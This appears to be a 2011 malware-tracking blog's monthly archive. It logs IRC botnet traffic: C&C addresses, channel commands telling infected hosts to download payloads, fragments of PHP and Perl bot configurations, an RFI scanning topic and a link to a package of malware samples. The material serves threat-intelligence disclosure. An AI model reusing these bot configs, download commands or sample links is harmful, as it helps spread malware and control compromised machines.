Month: March 2011

88.198.64.134:2345 Nick: New[AUT|00|P|37328] Username: XP-7319 Joined Channel: #!loco! Channel Topic for Channel #!loco!: “D http://redir.ec/images2313?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]: Thread Disabled.” Private Message to User New[AUT|00|P|37328]: “.hp http://domredi.com/1/” infos about hosting: http://whois.domaintools.com/88.198.64.134

here another package with diferent malware samples ii.exe is the bot exe from snk our ruski hecker Download: http://c5be3f78.whackyvidz.com

Remote Host Port Number 91.121.96.162 5540 MODE pLagUe{USA}50784 -ix JOIN #drako MODE #drako -ix PONG irc2.accesox.net PRIVMSG #drako : Hola Amos. PONG A99D4269 JOIN ##verga## MODE ##verga## -ix PONG f2.accesox.net MODE pLagUe{USA}55216 -ix PRIVMSG ##verga## : NueVo PuTo InfeCcIoN. infos about hosting: http://whois.domaintools.com/91.121.96.162

Remote Host Port Number 174.37.200.82 80 216.178.38.224 80 216.178.39.11 80 64.208.241.41 80 69.171.224.42 80 216.240.143.200 1234 PASS xxx MODE NEW-[USA|00|P|22588] -ix JOIN #!nn! test PONG 22 MOTD NICK NEW-[USA|00|P|22588] USER XP-4207 * 0 :COMPUTERNAME infos about hosting: http://whois.domaintools.com/216.240.143.200

onlinedatingsecretfriends.com 97.79.238.39 127.0.0.1 127.0.0.1 onemouseklick.com 96.9.186.133 zonetf.com 96.9.169.85 freecdvideo.com 66.199.251.242 www.google.com 209.85.149.105 www.yahoo.com 87.248.122.122 Opened listening TCP connection on port: 55192 Outgoing connection to remote server: onlinedatingsecretfriends.com TCP port 80 Outgoing connection to remote server: freecdvideo.com TCP port 80 Outgoing connection to remote server: zonetf.com TCP port 80 Outgoing connection to remote server: zonetf.com TCPRead more...

Remote Host Port Number 95.142.163.151 5900 PASS Virus NICK VirUs-kszumcce USER VirUs “” “gpm” : 8Coded 8Ahmed.Ramzey@Hotmail.Com.. JOIN #3new# Virus PONG :TESTING3.VirUs.HERE infos about hosting: http://whois.domaintools.com/95.142.163.151

linux bots inside var $config = array(“server”=>”188.116.52.163”, “port”=>”31336”, “pass”=>”haslo”, “prefix”=>”php”, “maxrand”=>”3”, “chan”=>”#php”, “chan2″=>”#php”, “key”=>””, “modes”=>”+ps”, “password”=>”haslo”, infos about hosting: http://whois.domaintools.com/188.116.52.163

205.234.145.229:2345 Nick: New[AUT|00|P|35974] Username: XP-3032 Joined Channel: #!loco! Channel Topic for Channel #!loco!: “D http://ibe.am/images004?=” Private Message to Channel #!loco!: “[M]: Thread Activated: Sending Message With Email.” Private Message to Channel #!loco!: “[M]: Thread Disabled.” Private Message to User New[AUT|00|P|35974]: “.hp http://domredi.com/1/” infos about hosting: http://whois.domaintools.com/205.234.145.229

Linux bots here from egyptian hecker my $fakeproc = “/usr/sbin/httpd”; my $ircserver = “phython.no-ip.biz”; my $ircport = “7000”; my $nickname = “BR[“.int(rand(100)).”]”; my $ident = “Bra”; my $channel = “#help”; my $admin = “Bjes”; scaning actions Now talking in #help Topic On: [ #help ] [ RFI][-][][ http://www.stanford.edu//?_SERVER[DOCUMENT_ROOT]= ] Topic By: [ Subali ] ModesRead more...

Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 89.114.9.42 80 89.114.9.60 80 123.183.217.32 1110 61.158.145.4 6939 PASS laorosr aaaaaaa.taybasoft.com TCP port 6939 PRIVMSG #d2 :Err0r.. PRIVMSG #d2 :Done.. MODE [N00_USA_XP_2208150] @ -ix # the data identified by the following URLs was then requested from the remote web server: * http://www.nippon.to/cgi-bin/prxjdg.cgi * http://www.cooleasy.com/cgi-bin/prxjdg.cgi * http://two.natnatraoi.com/ms.exe *Read more...